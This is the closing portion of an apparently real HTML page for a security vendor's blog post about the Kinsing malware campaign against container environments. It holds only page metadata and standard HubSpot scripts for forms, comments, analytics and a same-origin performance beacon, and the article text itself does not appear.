     "headline": "Threat Alert: Kinsing Malware Attacks Targeting Container Environments",
     "image": {
          "@type": "ImageObject",
          "url": "https://cdn2.hubspot.net/hubfs/1665891/Blog/04-6-20%20Kinsing%20threat%20alert/threatAlertViralSpread4-650-315.jpg"
     },
     "datePublished": "2020-04-03 12:00:00",
     "dateModified": "November 17, 2020, 10:53:05",
     "author": {
         "@type": "Person",
         "name": "Gal Singer"
     },
     "publisher": {
         "@type": "Organization",
         "name": "Aqua Security",
         "logo": {
             "@type": "ImageObject",
             "url": "https://f.hubspotusercontent40.net/hubfs/1665891/SVG__2020%20Aqua%20Logo%20Color.svg"
         }
     },
     "description": "An ambitious attack campaign directed by resourceful actors targeting misconfigured container environments, stands out with thousands of attempts on a daily basis"
 }
 </script></div><!--end widget-span -->

</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-global_group " style="" data-widget-type="global_group" data-x="0" data-w="12">
<div class="" data-global-widget-path="generated_global_groups/7516015189.html"><div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_153895222154164" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="container-fluid footer_wrap">
<div class="page-center footer_widgets_wrap">
<div class="span3 col-md-offset-1 footer_2">
<ul>
<div id="nav_menu-2" class="widget widget_nav_menu">
<div class="widget_title">Use Cases</div>
<div class="menu-use-cases-container">
<ul id="menu-use-cases" class="menu">
<li><a href="https://www.aquasec.com/use-cases/devsecops-automation/">Automate DevSecOps</a></li>
<li><a href="https://www.aquasec.com/use-cases/container-security/">Modernize Security</a></li>
<li><a href="https://www.aquasec.com/use-cases/container-auditing-compliance/">Compliance and Auditing</a></li>
<li><a href="https://www.aquasec.com/use-cases/serverless-container-functions/">Serverless Containers &amp; Functions</a></li>
<li><a href="https://www.aquasec.com/use-cases/multi-cloud-and-hybrid-cloud/">Hybrid and Multi Cloud</a></li>
</ul>
</div>
</div>
<div id="nav_menu-9" class="widget widget_nav_menu">
<div class="widget_title">Environments</div>
<div class="menu-environments-container">
<ul id="menu-environments" class="menu">
<li><a href="https://www.aquasec.com/solutions/kubernetes-container-security/">Kubernetes Security</a></li>
<li><a href="https://www.aquasec.com/solutions/red-hat-openshift-container-security/">OpenShift Security</a></li>
<li><a href="https://www.aquasec.com/solutions/docker-container-security/">Docker Security</a></li>
<li><a href="https://www.aquasec.com/solutions/aws-container-security/">AWS Cloud Security</a></li>
<li><a href="https://www.aquasec.com/solutions/azure-container-security/">Azure Cloud Security</a></li>
<li><a href="https://www.aquasec.com/solutions/google-cloud-kubernetes-security/">Google Cloud Security</a></li>
<li><a href="https://www.aquasec.com/solutions/vmware-pks-security/">VMware PKS Security</a></li>
</ul>
</div>
</div>
<div id="nav_menu-4" class="widget widget_nav_menu">
<div class="widget_title">Contact Us</div>
<div class="menu-partners-container">
<ul id="menu-partners" class="menu">
<li><a href="https://www.aquasec.com/about-us/contact-us/">Contact Us</a></li>
<li><a href="https://success.aquasec.com/#/">Contact Support</a></li>
</ul>
</div></div>
</ul>
</div>
<div class="span3 col-xs-6 footer_3">
<ul>
<div id="nav_menu-3" class="widget widget_nav_menu">
<div class="widget_title">Products</div>
<div class="menu-products-container">
<ul id="menu-products" class="menu">
<li><a href="https://www.aquasec.com/products/aqua-cloud-native-security-platform/">Aqua Cloud native security)</a></li>
<li><a href="https://www.aquasec.com/products/open-source-projects/">Open Source Container Security</a></li>
<li><a href="https://www.aquasec.com/integrations/">Platform Integrations</a></li>
</ul>
</div>
</div>
<div id="nav_menu-8" class="widget widget_nav_menu">
<div class="widget_title">Resources</div>
<div class="menu-resources-container">
<ul id="menu-resources" class="menu">
<li><a href="https://www.aquasec.com/resources/virtual-container-security-channel/">Live Webinars</a></li>
<li><a href="https://info.aquasec.com/kubernetes-security">O’Reilly Book: Kubernetes Security</a></li>
<li><a href="https://www.aquasec.com/cloud-native-academy">Cloud native Wiki</a></li>
</ul>
</div>
</div>
<div id="nav_menu-6" class="widget widget_nav_menu">
<div class="widget_title">About Us</div>
<div class="menu-about-us-container">
<ul id="menu-about-us" class="menu">
<li><a href="https://www.aquasec.com/about-us/">About Aqua</a></li>
<li><a href="https://www.aquasec.com/about-us/news/">Newsroom</a></li>
<li><a href="https://www.aquasec.com/about-us/careers/">Careers</a></li>
</ul>
</div>
</div>
</ul>
</div>
<div class="footer_cubes"></div>
<div class="footer_wrap_top_waves"></div>
<div class="footer_wrap_sunrays"></div>
</div>
</div></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->
</div>
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end footer -->
</div><!--end footer wrapper -->

    
<script>
// Page-load performance beacon.
// Three seconds after the window `load` event this POSTs a JSON document to the
// same-origin endpoint /_hcms/perf. The document carries the full page URL
// (location.href, so query string and fragment are included), the fixed
// portal/content/group identifiers, whatever connection hints the browser
// exposes, and performance.timing.
(function () {
    var SEND_DELAY_MS = 3000;  // Execute this 3 seconds after onload.
    var CONNECTION_FIELDS = ['type', 'effectiveType', 'downlink', 'rtt'];

    // Copies the connection fields the browser actually exposes, in list order.
    function readConnectionInfo() {
        var source = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
        var collected = {};
        if (source) {
            for (var i = 0; i < CONNECTION_FIELDS.length; i++) {
                var field = CONNECTION_FIELDS[i];
                if (field in source) {
                    collected[field] = source[field];
                }
            }
        }
        return collected;
    }

    // Builds the payload and sends it; the response is deliberately ignored.
    function sendBeacon() {
        var request = new XMLHttpRequest();
        request.open('POST', '/_hcms/perf', true /*async*/);
        request.setRequestHeader("Content-type", "application/json");
        request.onreadystatechange = function () {
            // do nothing.
        };

        var payload = {
            url: location.href,
            portal: 1665891,
            content: 27901722055,
            group: -1,
            connection: readConnectionInfo(),
            timing: performance.timing
        };
        request.send(JSON.stringify(payload));
    }

    window.addEventListener('load', function () {
        setTimeout(function () {
            sendBeacon();
        }, SEND_DELAY_MS);
    });
})();
</script>

<script src="https://blog.aquasec.com/hs-fs/hub/1665891/hub_generated/template_assets/7511165868/1575250830489/Coded_files/Custom/page/Aqua_Theme_2019/aqua_theme_2019_scripts.js"></script>
<script>
// Record the page language on the shared hsVars object, but only when that
// global has already been defined by an earlier script.
if (typeof hsVars !== 'undefined') { hsVars['language'] = 'en-us'; }
</script>

<script src="/hs/hsstatic/cos-i18n/static-1.53/bundles/project.js"></script>

    <!--[if lte IE 8]>
    <script charset="utf-8" src="https://js.hsforms.net/forms/v2-legacy.js"></script>
    <![endif]-->

<script data-hs-allowed="true" src="/_hcms/forms/v2.js"></script>

  <script data-hs-allowed="true">
      // Embeds a HubSpot form into the element matched by `target`. Presumably the
      // blog subscription form, judging by the inline message below — confirm.
      hbspt.forms.create({
          portalId: '1665891',
          formId: 'fc3a461b-474b-4bd2-b409-c41d4ec09d8a',
          formInstanceId: '1',
          pageId: '27901722055',
          region: 'na1',
          
          pageName: 'Threat Alert: Kinsing Malware Attacks Targeting Container Environments',
          
          contentType: 'blog-post',
          
          // Relative path, so it resolves against this site's own origin.
          formsBaseUrl: '/_hcms/forms/',
          
          
          // Text displayed after the form has been submitted successfully.
          inlineMessage: "Thanks for Subscribing!",
          
          css: '',
          // CSS selector of the placeholder element that receives the form.
          target: '#hs_form_target_module_14538258496742317_1',
          
          formData: {
            cssClass: 'hs-form stacked'
          }
      });
  </script>

<script src="/hs/hsstatic/AsyncSupport/static-1.122/js/post_listing_asset.js"></script>
<script>
  // Loads the "popular posts" listing by handing a fixed option set to
  // window.hsPopulateListingFeed. The listing URL is same-origin and carries
  // hs-expires / hs-signature parameters, so it must be passed through unchanged.
  function hsOnReadyPopulateListingFeed_1248747767_1640191865846() {
    window.hsPopulateListingFeed({
      'id': "1248747767-1640191865846",
      'listing_url': "/_hcms/postlisting?blogId=3657573699&maxLinks=5&listingType=popular_all_time&orderByViews=true&hs-expires=1671727865&hs-version=2&hs-signature=AJ2IBuFwNrQWYcQIxhQeDVEzFDCPumD4tw",
      'include_featured_image': false
    });
  }

  // Defer until DOMContentLoaded when the document is still being parsed (or when
  // the legacy doScroll probe is present); otherwise run straight away.
  if (document.readyState !== "complete" &&
      (document.readyState === "loading" || document.documentElement.doScroll)
  ) {
    document.addEventListener("DOMContentLoaded", hsOnReadyPopulateListingFeed_1248747767_1640191865846);
  } else {
    hsOnReadyPopulateListingFeed_1248747767_1640191865846();
  }
</script>

<script src="/hs/hsstatic/AsyncSupport/static-1.122/js/comment_listing_asset.js"></script>
<script>
  // Loads the public comment thread for this post by handing a fixed option set
  // to window.hsPopulateCommentsFeed. Comments are fetched cross-origin from
  // api-na1.hubapi.com and are user-supplied text.
  // NOTE(review): confirm the feed script escapes comment content before inserting it.
  function hsOnReadyPopulateCommentsFeed() {
    window.hsPopulateCommentsFeed({
      commentsUrl: "https://api-na1.hubapi.com/comments/v3/comments/thread/public?portalId=1665891&offset=0&limit=1000&contentId=27901722055&collectionId=3657573699",
      maxThreadDepth: 1,
      showForm: true,

      skipAssociateContactReason: 'blogComment',
      disableContactPromotion: true,

      target: "hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c"
    });
  }

  // Defer until DOMContentLoaded when the document is still being parsed (or when
  // the legacy doScroll probe is present); otherwise run straight away.
  if (document.readyState !== "complete" &&
      (document.readyState === "loading" || document.documentElement.doScroll)
  ) {
    document.addEventListener("DOMContentLoaded", hsOnReadyPopulateCommentsFeed);
  } else {
    hsOnReadyPopulateCommentsFeed();
  }

</script>


          <!--[if lte IE 8]>
          <script charset="utf-8" src="https://js.hsforms.net/forms/v2-legacy.js"></script>
          <![endif]-->
      

        <script data-hs-allowed="true">
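            // Embeds the blog comment form into its placeholder element.
            hbspt.forms.create({
                portalId: '1665891',
                formId: 'bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c',
                pageId: '27901722055',
                region: 'na1',
                pageName: "Threat Alert: Kinsing Malware Attacks Targeting Container Environments",
                contentType: 'blog-post',

                // Relative path, so it resolves against this site's own origin.
                formsBaseUrl: '/_hcms/forms/',

                css: '',
                target: "#hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c",
                type: 'BLOG_COMMENT',

                submitButtonClass: 'hs-button primary',
                formInstanceId: '1',
                getExtraMetaDataBeforeSubmit: window.hsPopulateCommentFormGetExtraMetaDataBeforeSubmit
            });

            // Reacts to the form's postMessage callbacks (form ready / form submitted).
            // Any window holding a reference to this one can post a message, so the
            // sender's origin and the message shape are validated before acting on it.
            window.addEventListener('message', function(event) {
              var origin = event.origin;
              var data = event.data;

              // Compare origins exactly. Matching the origin as a prefix of
              // location.href would also accept a different origin whose string
              // happens to be a prefix of this page's URL.
              var pageOrigin = window.location.origin ||
                  (window.location.protocol + '//' + window.location.host);  // fallback for browsers without location.origin
              var isSameOrigin = typeof origin === 'string' &&
                  origin.toLowerCase() === pageOrigin.toLowerCase();

              // NOTE(review): the opaque origin 'null' is still accepted, as before, so
              // sandboxed or otherwise opaque-origin frames pass this check. Kept for
              // backward compatibility; confirm whether the form ever posts from such a
              // frame and drop this branch if it does not. The callbacks below must stay
              // limited to UI updates while it remains.
              var isOpaqueOrigin = origin === 'null';

              if (!isSameOrigin && !isOpaqueOrigin) {
                return;
              }

              // Other scripts post strings or undefined; only object payloads are ours.
              if (data === null || typeof data !== 'object') {
                return;
              }
              if (data.type !== 'hsFormCallback' || data.id !== 'bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c') {
                return;
              }

              if (data.eventName === 'onFormReady') {
                window.hsPopulateCommentFormOnFormReady({
                  successMessage: "your comment has been received.",
                  target: "#hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c"
                });
              } else if (data.eventName === 'onFormSubmitted') {
                window.hsPopulateCommentFormOnFormSubmitted();
              }
            });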
        </script>
      

<!-- Start of HubSpot Analytics Code -->
<script type="text/javascript">
// Command queue for the HubSpot analytics code; an existing queue is reused if
// one has already been defined on the page.
var _hsq = _hsq || [];
// Each entry is [commandName, argument]. These four describe the current page:
// its content type, canonical URL, page id and content metadata.
_hsq.push(["setContentType", "blog-post"]);
_hsq.push(["setCanonicalUrl", "https:\/\/blog.aquasec.com\/threat-alert-kinsing-malware-container-vulnerability"]);
_hsq.push(["setPageId", "27901722055"]);
_hsq.push(["setContentMetadata", {
    "contentPageId": 27901722055,
    "legacyPageId": "27901722055",
    "contentFolderId": null,
    "contentGroupId": 3657573699,
    "abTestId": null,
    "languageVariantId": 27901722055,
    "languageCode": "en-us",
    
}]);
</script>

<script type="text/javascript" id="hs-script-loader" async defer src="/hs/scriptloader/1665891.js"></script>
<!-- End of HubSpot Analytics Code -->


<script type="text/javascript">
// Global bag of page, portal and analytics identifiers for this page.
// Everything here is delivered to the browser and can be changed by the visitor.
var hsVars = {
    ticks: 1640191865795,
    page_id: 27901722055,
    
    content_group_id: 3657573699,
    portal_id: 1665891,
    app_hs_base_url: "https://app.hubspot.com",
    cp_hs_base_url: "https://cp.hubspot.com",
    language: "en-us",
    analytics_page_type: "blog-post",
    analytics_page_id: "27901722055",
    category_id: 3,
    folder_id: 0,
    // NOTE(review): client-side flag; any consumer should treat it as a display
    // hint only, never as an authorization decision — confirm against the readers.
    is_hubspot_user: false
}
</script>


<script defer src="/hs/hsstatic/HubspotToolsMenu/static-1.119/js/index.js"></script>

 


    
    <!-- Generated by the HubSpot Template Builder - template version 1.03 -->

</body></html>